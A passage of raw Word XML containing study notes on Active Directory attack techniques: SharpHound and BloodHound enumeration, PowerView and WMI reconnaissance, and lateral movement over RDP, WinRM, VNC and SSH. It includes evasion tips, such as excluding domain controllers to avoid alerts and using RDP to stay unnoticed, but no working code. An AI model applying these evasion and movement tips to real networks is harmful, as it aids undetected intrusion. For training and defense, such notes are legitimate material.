        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B91E641" w14:textId="5BD0888B" w:rsidR="00F84008" w:rsidRPr="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F84008">
        <w:t>the domain we want to enumerate. In some instances, you may want to enumerate a parent or other domain that has trust with your existing domain</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B1EC8" w14:textId="77777777" w:rsidR="00F84008" w:rsidRPr="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ExcludeDCs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84008">
        <w:t xml:space="preserve"> -This will instruct Sharphound not to touch domain controllers, which reduces the likelihood that the Sharphound run will raise an alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8716D1" w14:textId="41FEE9DB" w:rsidR="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00F84008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>All other Parameters</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="784E6D4F" w14:textId="4B8E570B" w:rsidR="00F84008" w:rsidRDefault="00DE5E6B" w:rsidP="00DE5E6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00DE5E6B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Download Sharphound PS1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A22A67F" w14:textId="29595B6F" w:rsidR="0001593C" w:rsidRPr="0001593C" w:rsidRDefault="0001593C" w:rsidP="00F84008">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In bloodhound Graph:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D47B9A" w14:textId="77777777" w:rsidR="0001593C" w:rsidRPr="0001593C" w:rsidRDefault="0001593C" w:rsidP="0001593C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0001593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution Rights</w:t>
      </w:r>
      <w:r w:rsidRPr="0001593C">
        <w:t> - Provides information on special privileges such as the ability to RDP into a machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796948A" w14:textId="77777777" w:rsidR="0001593C" w:rsidRPr="0001593C" w:rsidRDefault="0001593C" w:rsidP="0001593C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0001593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outbound Control Rights</w:t>
      </w:r>
      <w:r w:rsidRPr="0001593C">
        <w:t> - Shows information regarding AD objects where this account has permissions to modify their attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD6AEA" w14:textId="6580EA7E" w:rsidR="0001593C" w:rsidRPr="0001593C" w:rsidRDefault="0001593C" w:rsidP="0001593C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0001593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inbound Control Rights</w:t>
      </w:r>
      <w:r w:rsidRPr="0001593C">
        <w:t> - Provides information regarding AD objects that can modify the attributes of this account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F90DE8" w14:textId="77777777" w:rsidR="0001593C" w:rsidRPr="00F84008" w:rsidRDefault="0001593C" w:rsidP="00F84008"/>
    <w:p w14:paraId="45EA8984" w14:textId="05E33F04" w:rsidR="001C5486" w:rsidRDefault="008007D0" w:rsidP="008007D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008007D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tab:</w:t>
      </w:r>
      <w:r w:rsidRPr="008007D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008007D0">
        <w:t>These are queries that the creators of Bloodhound have written themselves to enumerate helpful information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6D4DE" w14:textId="39A76394" w:rsidR="00385468" w:rsidRDefault="008007D0" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bloodhound Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB3D2D" w14:textId="19AE8B00" w:rsidR="008007D0" w:rsidRDefault="008007D0" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="581733C0" wp14:editId="1E95AC56">
            <wp:extent cx="5943600" cy="1887855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="686652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52939"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p>
    <w:p w14:paraId="46FE8D23" w14:textId="0B9418B0" w:rsidR="008007D0" w:rsidRDefault="008007D0" w:rsidP="008007D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008007D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Each AD object can be a node in Bloodhound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF99255" w14:textId="2ADAA173" w:rsidR="008007D0" w:rsidRDefault="00144112" w:rsidP="00144112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00144112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e need to look at the available edges between the current position and privileges we have and where we want to go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA8C1F" w14:textId="792084D0" w:rsidR="00144112" w:rsidRDefault="00D11CCD" w:rsidP="00D11CCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D11CCD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Bloodhound documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D11CCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87B1A9" w14:textId="27AC7941" w:rsidR="00DE5E6B" w:rsidRDefault="00DE5E6B" w:rsidP="00D11CCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00DE5E6B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Download Bloodhound githup</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68680513" w14:textId="05DB27BB" w:rsidR="00D11CCD" w:rsidRDefault="00D11CCD" w:rsidP="00D11CCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D11CCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requires the execution of Sharphound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C036164" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CFEA1B" w14:textId="3E6E96D8" w:rsidR="00704185" w:rsidRDefault="00704185" w:rsidP="00704185">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00704185">
        <w:t>Additional Enumeration Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496777D2" w14:textId="08E5EE8C" w:rsidR="006B3A84" w:rsidRDefault="006B3A84" w:rsidP="006B3A84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3A84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>PowerView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006B3A84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3A84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> recon script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3A84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> useful to perform semi-manual enumeration of AD objects in a pinch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342E521" w14:textId="2231C2B9" w:rsidR="008D6E64" w:rsidRPr="006B3A84" w:rsidRDefault="008D6E64" w:rsidP="008D6E64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="1153E4"/>
          </w:rPr>
          <w:t>Windows Management Instrumentation (</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="glossary-term"/>
            <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="1153E4"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>WMI</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="1153E4"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t> can be used to enumerate information from Windows hosts. It has a provider called "</w:t>
      </w:r>
      <w:r w:rsidRPr="008D6E64">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>root\directory\ldap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>" that can be used to interact with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>. We can use this provider and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t> to perform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t> enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B958F7" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B362E9B" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694E4D59" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C42F285" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8D48B5" w14:textId="77777777" w:rsidR="00F85500" w:rsidRDefault="00F85500" w:rsidP="00F85500">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F85500">
        <w:t>Lateral Movement and Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019323CC" w14:textId="29354F62" w:rsidR="00F85500" w:rsidRDefault="00F85500" w:rsidP="00F85500">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00F85500">
        <w:t>ateral movement is the group of techniques used by attackers to move around a network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7899F" w14:textId="635A0BB1" w:rsidR="00F85500" w:rsidRDefault="00F85500" w:rsidP="00F85500">
      <w:r>
        <w:t>Step after getting initial access to a machine on Network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DE527" w14:textId="29BDAE8D" w:rsidR="00F85500" w:rsidRDefault="00F85500" w:rsidP="00F85500">
      <w:r>
        <w:t>It’s Optional according to our goal where we need to reach and why.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA2233" w14:textId="751DF8FB" w:rsidR="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00F85500">
      <w:r>
        <w:t>It’s a cycle so movement may be made many times until reach our goal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C9BC0" w14:textId="2FDBA4B2" w:rsidR="00F85500" w:rsidRDefault="00F85500" w:rsidP="00F85500">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="184A1BA1" wp14:editId="00084BA1">
            <wp:extent cx="4098471" cy="1826359"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="925662280" name="Picture 1" descr="A diagram of different colo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2280" name="Picture 1" descr="A diagram of different colored arrow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111003" cy="1831943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="399CAE31" w14:textId="77777777" w:rsidR="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F85500">
        <w:t>Moving Through the Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015DD097" w14:textId="7D4FAFF3" w:rsidR="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:r>
        <w:t>Move from machine to machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC4308" w14:textId="377AE988" w:rsidR="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:r w:rsidRPr="00D668B6">
        <w:t xml:space="preserve">Lateral movement might need to be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>circumvent firewall restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:t xml:space="preserve">, it is also helpful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evading detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:t>. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A4FC0" w14:textId="179786EF" w:rsidR="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B204E06" wp14:editId="57D9BC46">
            <wp:extent cx="4408714" cy="1817056"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713606547" name="Picture 2" descr="A diagram of a fire safe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06547" name="Picture 2" descr="A diagram of a fire safety syste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424318" cy="1823487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82CC79" w14:textId="77777777" w:rsidR="00D668B6" w:rsidRPr="00F85500" w:rsidRDefault="00D668B6" w:rsidP="00F85500"/>
    <w:p w14:paraId="590A3902" w14:textId="77777777" w:rsidR="00D668B6" w:rsidRPr="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Attacker's Perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A097E29" w14:textId="6FCDE05D" w:rsidR="00385468" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ttackers can move laterally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C4512" w14:textId="129DAD69" w:rsidR="00D668B6" w:rsidRPr="00D668B6" w:rsidRDefault="00D668B6" w:rsidP="00D668B6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D668B6">
        <w:t xml:space="preserve">use standard administrative protocols like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VNC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00D668B6">
        <w:t> to connect to other machines around the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BAFCAC" w14:textId="07B5FCAF" w:rsidR="00D668B6" w:rsidRPr="00EA1A0B" w:rsidRDefault="00EA1A0B" w:rsidP="00EA1A0B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A0B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RDP might be usual and go under the radar</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="003B5EDE" w:rsidRPr="00EA1A0B">
        <w:t>maybe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t xml:space="preserve"> another user is connected to machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C27863" w14:textId="70B1E2C8" w:rsidR="00F85500" w:rsidRDefault="00F85500" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D93D7E9" w14:textId="77777777" w:rsidR="00EA1A0B" w:rsidRPr="00EA1A0B" w:rsidRDefault="00EA1A0B" w:rsidP="00EA1A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrators and UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46948576" w14:textId="587EF4D9" w:rsidR="00EA1A0B" w:rsidRDefault="00EA1A0B" w:rsidP="00EA1A0B">
      <w:r w:rsidRPr="00EA1A0B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>User Account Control (UAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t xml:space="preserve"> helps prevent malware from damaging a PC and helps organizations deploy a better-managed desktop. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. UAC can block the automatic installation of unauthorized apps and prevent inadvertent changes to system settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB50EC" w14:textId="757A7BFA" w:rsidR="00EA1A0B" w:rsidRPr="00EA1A0B" w:rsidRDefault="009D5966" w:rsidP="009D5966">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">distinction </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D5966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> be made between two types of administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C1A04" w14:textId="27456A50" w:rsidR="00EA1A0B" w:rsidRPr="00EA1A0B" w:rsidRDefault="00EA1A0B" w:rsidP="00EA1A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t>part</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t xml:space="preserve"> of the local Administrators group</w:t>
      </w:r>
      <w:r w:rsidR="000F36A1">
        <w:t xml:space="preserve"> on machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EF2B4" w14:textId="0EF3577D" w:rsidR="00EA1A0B" w:rsidRDefault="00EA1A0B" w:rsidP="000F36A1">
      <w:pPr>
